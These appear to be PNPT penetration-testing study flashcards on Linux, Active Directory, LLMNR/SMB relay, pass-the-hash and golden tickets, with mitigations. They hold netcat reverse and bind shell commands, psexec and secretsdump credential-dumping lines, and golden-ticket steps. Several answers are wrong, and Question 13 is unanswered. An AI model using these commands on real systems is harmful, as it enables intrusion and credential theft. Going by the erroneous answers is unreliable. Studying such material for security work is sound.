PNPT

Question 1

Linux File System: what is the /bin directory used for in Linux ?

Answer 1

bin is a directory which contains important executable programs and core OS commands

Question 2

Linux File System: what is the /boot directory used for in Linux ?

Answer 2

this directory contains the files needed by the boot loader

Question 3

Linux File System: what is the /dev directory used for in Linux ?

Answer 3

the /dev directory contains your device files

this directory will give you valuable info about whats connected to your system

Question 4

Linux file system: what is the /etc directory used for ?

Answer 4

this contains the critical configuration files and startup scripts

Question 5

Linux File system: what is the purpose of the /home directory ?

Answer 5

this is where users home files are stored similar to the documents folder in windows

Question 6

where are the users stored on a linux system ?

Answer 6

the directory where the users are stored on a linux machine is the /etc/passwd directory

Question 7

where are the passwords stored on a linux machine?

Answer 7

/etc/shadow is where all the passwords are stored in linux

Question 8

what command can we use to pull users from the sudoers files who can use sudo ?

Answer 8

grep ‘sudo’ /etc/group

Question 9

what are two ways we can list the IP’s on a linux system ?

Answer 9

ip -a
or
ifconfig

Question 10

how do we see the wireless connections on a linux machine ?

Answer 10

iwconfig

Question 11

how can we see the arp connections on a machine ?

Answer 11

arp -a
or
IP n

Question 12

how do we see the routing table on our PC ?

Answer 12

route

Question 13

what command do we use to see open ports and services on a linux machine ?

Question 14

where are the apache files that can be stored on the web server found ?

Answer 14

/var/www/html

Question 15

how can we spin up a webserver on the fly with python ?

Answer 15

Python3 -m http.server 80

Question 16

what are the 5 stages of ethical hacking ?

Answer 16

1. Recon
2. Scanning and Enumeration
3. gaining access
4. maintaining access
5. covering tracks

Question 17

how can we use the netdiscover command to discover other hosts on the network ?

Answer 17

netdiscover -r 192.168.57.0/24

Question 18

what are some ways we can enumerate SMB?

Answer 18

Smb is a file share

We want to figure out the version of smb running

The metasploit module /auxiliary/scanner/smb/smb_version is a good way of discovering the version of smb running

Sometimes smb will allow anonymous access, this will allow us to see files in the file share. We always want to check if there is anonymous access

We can check for anonymous smb access with the smbclient command:
Smbclient –L \192.168.57.134\

Question 19

what is a reverse shell ?

Answer 19

A reverse shell is when a victim connects to us, target is connecting attack box is listening

Most of the time we use reverse shells

Question 20

what is a bind shell?

Answer 20

Bind shell we open up a port on our attack box that connects to the victim
Bind shell we connect to the target

Most of the time we use reverse shells
Bind shells are usually used on an external assessment

Question 21

how do we create a reverse shell with netcat ?

Answer 21

Attacker: nc –nlvp 4444
Victim: nc <ip> 4444</ip>

Question 22

how do we create a bind shell with netcat ?

Answer 22

Victim: Nc –nvlp 4444 –e /bin/bash
Attacker: nc <ip> 4444</ip>

Question 23

what are non staged payloads ?

Answer 23

• Sends exploit shellcode all at once
  Larger in size and wont always work

Question 24

what are staged payloads ?

Answer 24

• Sends payload in stages
  Can be less stable

Question 25

what is credential stuffing ?

Answer 25

injecting breached account credentials in hopes of account takeover

Question 26

what is active directory ?

Answer 26

- Directory service developed by Microsoft to manage windows domain networks - Stores information related to objects, such as Computers, Users, Printers etc Think about it as a phone book for windows

Question 27

what does AD use for authentication ?

Answer 27

○ Non windows devices such as Linux machines, firewalls, etc can also authenticate to Active Directory via RADIUS or LDAP

Question 28

what is a domain controller ?

Answer 28

Domain controller - a domain controller is a server with the AD DS server role installed that has specifically been promoted to a domain controller

Question 29

what are some of the features of domain controllers ?

Answer 29

- Host a copy of the AD DS directory store - Provide authentication and authorization services - Replicate updates to other domain controllers in the domain and forest - Allow administrative access to manage user accounts and network resources

Question 30

what is the AD DS data store ?

Answer 30

the AD DS data store contains the database files and processes that store and manage directory information for users, services and applications

Question 31

what are some attributes of the AD DS data store ?

Answer 31

- Consists of the NTDS.dit file - Is stored by default in the %SystemRoot%\NTDS folder on all domain controllers Is accessible only through the domain controller processes and protocols

Question 32

what is the AD DS Schema ?

Answer 32

- defines every type of object that can be stored in the directory - Enforces rules regarding object creating and configuration Blueprint

Question 33

what are some features of active directory domains ?

Answer 33

- Domains are used to group and manage objects in the organization - An administrative boundary for applying policies to groups of objects - A replication boundary for replicating data between domain controllers - An authentication and authorization boundary that provides a way to limit the scope of access to resources

Question 34

what are some characteristics of AD trees ?

Answer 34

- A domain tree is a hierarchy of domains in AD DS - All domains in the tree ○ Share a contiguous namespace with the parent domain ○ Can have additional child domains ○ By default create a two way transitive trust with other domains - Parent domains and children domains they look like sub domains

Question 35

what are some characteristics of AD OU's?

Answer 35

- OU's are active directory containers that contain users, groups, computers and other OU's - Represent your organization hierarchically and logically - Manage a collection of objects in a consistent way - Delegate permissions to administer groups of objects - Apply polices

Question 36

what are some characteristics of AD trusts ?

Answer 36

Types of trusts - Directional - the trust direction flows from trusting domain to the trusted domain - Transitive, the trust relationship is extended beyond a two domain trust to include other trusted domains , these can go tree to tree or forest to forest - All domains in a forest trust all other domains in the forest Trusts can extend outside the forest

Question 37

what are some examples of AD objects ?

Answer 37

User - enables network resource access for a user InetOrgPerson - similar to a user account / used for compatibility with other directory services Contacts - used primarily to assign e-mail addresses to external users / Does not enable network access Groups - used to simplify the administration of access control Computers - enables authentication and auditing of computer access to resources Printers - used to simplify the process of locating and connecting printers Shared Folders - enables users to search for shared folders based on properties

Question 38

what is LLMNR ?

Answer 38

- used to identify hosts when DNS fails to do so - previously NBT-NS - the key flaw with LLMNR is that the service utilizes a users username and NTLMv2 has when appropriately responded to

Question 39

what are some of the mitigations for LLMNR poisoning ?

Answer 39

- The best defense in this case it to disable LLMNR and NBT-NS - To disable LLMNR select turn off multicast name resolution ○ Under local computer policy > computer configuration > administrative templates > network > DNS client in the group policy editor - If a company must use or cant disable LLMNR/NBT-NS the best course of action is to ○ Require network access control Require strong user passwords the more complex and long the harder it is to crack the hash

Question 40

what is an smb relay attack ?

Answer 40

- Instead of cracking hashes gathered with responder, we can instead relay those hashes to specific machines and potentially gain access

Question 41

what are the requirements for SMB signing ?

Answer 41

- smb signing must be disabled or not enforced on the target - relayed user credentials must be admin on a machine for any real value

Question 42

What are some of the SMB relay attack mitigations ?

Answer 42

- Enable smb signing on all devices ○ Pro / completely stops the attack ○ Con / can cause performance issues with file copies - Disable NTLM authentication on the network ○ Pro / completely stops the attack ○ Con / if Kerberos stops working, Windows defaults back to NTLM - Account tiering ○ Pro / Limits domain admins to specific tasks ○ Con / Enforcing the policy may be difficult - Local Admin Restrictions ○ Pro / Can prevent a lot of lateral movement ○ Con / potential increase in the amount of service desk tickets

Question 43

what are some ways we can get shells with user credentials

Answer 43

We can gain a shell through metasploit if we have the password: Use exploit/windows/smb/psexec Gaining shell access with psexec.py with a password: Psexec.py domain/user:'Password'@IP Through psexec with a hash: Psexec.py administrator@10.0.0.24 -hashes LM:NT

Question 44

explain IPv6 poisoning

Answer 44

Ipv6 posioning abuses the fact that windows queries for an ipv6 address even in ipv4 only environments. If you do not use ipv6 internally the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in windows firewall via group policy. Disabling ipv6 entirely may have unintended consequences

Question 45

what are some mitigations against IPv6 attacks ?

Answer 45

if wpad is not in use internally disable it via group policy and by disabling the WinHttpautopProxySvc service Relaying to ldap and ldaps can only be mitigated by enabling both ldap signing and ldap channel binding Consider administrative user to the protected user group or making them as account is sensitve and cannot be delegated, which will prevent of the impersonation of that user via delegation

Question 46

what would our internal attack strategy be on an internal pentest

Answer 46

begin the day with mitm6 and responder run scans to generate traffic, Nessus scans, Vulnerability Scans, Look for websites in scopes look for default credentials on web logins

Question 47

what are pass attacks ?

Answer 47

if we crack a password and or can dump the SAM hashes we can leverage both for lateral movements in our network We can do pass attacks with hashes not just passwords

Question 48

what hashes do pass the has attacks work with ?

Answer 48

pass the hash attacks only work with NTLMv1 not NTLMv2

Question 49

what is the point of lsass in a windows environment ?

Answer 49

lsass is responsible for enforcing the security policy on a system it also stores credentials

Question 50

if we compromise an account and get a login somewhere what is one of the first things we want to do ?

Answer 50

if you get an account and get a login somewhere you want to dump the secrets of that machine secrets dump can be run with a password or a hash

Question 51

what are some of the juicy details we want to capture with secrets dump ?

Answer 51

you want to capture SAM hashes of administrators and users we want to do a secrets dump on every machine we get access to

Question 52

what are some pass attacks mitigations ?

Answer 52

Limit account re-use - avoid re using local admin password - disable guest and administrator accounts - limit who is a local admin Utilize stronger passwords - avoid using common words Pam solution

Question 53

what are some mitigations for kerborasting ?

Answer 53

strong passwords least privilege make sure service accounts are not domain admins

Question 54

what are tokens ?

Answer 54

temporary keys that allow you access to a system/network without having to provide credentials each time you access a file think cookies for computers

Question 55

what are the two types of tokens ?

Answer 55

delegate and impersonate

Question 56

what are delegate tokens ?

Answer 56

created for logging into a machine or using remote desktop / this is the most common type of token

Question 57

what are impersonate tokens ?

Answer 57

impersonate - non interactive such as attaching a network drive or domain logon script

Question 58

what are the mitigations for token attacks ?

Answer 58

limit user / group token creation permission account tearing local admin restriction

Question 59

what is the mimikatz tool used for ?

Answer 59

Tool used to view and steal credentials, generate kerberos tickets, and leverage attacks

Question 60

what attacks can mimikatz be used for ?

Answer 60

- credential dumping - pass the hash - over pass the hash -Pass the ticket - silver ticket - Golden ticket

Question 61

what should we do after compromising a user account ?

Answer 61

search for quick wins - kerberoasting - secrets dump - pass the hash pass the password ○ Enumerate bloodhound etc ○ Where do your account have access Old vulnerabilities die hard

Question 62

what should we do after we own the domain?

Answer 62

- Provide as much value to your client as possible ○ Put your blinders on and do it again ○ Dump the NTDS.dit and crack passwords ○ Enumerate shares for sensitive info - Persistence can be important ○ What happens if our DA account is lost ○ Creating a DA account can be useful Creating a golden ticket can be useful

Question 63

what is the NTDS.dit ?

Answer 63

- A database used to store AD data this data includes ○ User information ○ Group information ○ Security descriptors - And password hashes

Question 64

what tool can we use to dump the NTDS.dit ?

Answer 64

Secretsdump.py /: ''@ -just-dc-ntlm

Question 65

what is a golden ticket account ?

Answer 65

What is it ? - When we compromise the krbtgt account we own the domain - We can request access to any resource or system on the domain - Golden ticket = complete access to every machine Step 1. We can use mimikatz to carry out a golden ticket account Step 2. once we have the SID and krbtgt hash, we can generate the golden ticket Step 3. With a golden ticket we can now access other machines from the command line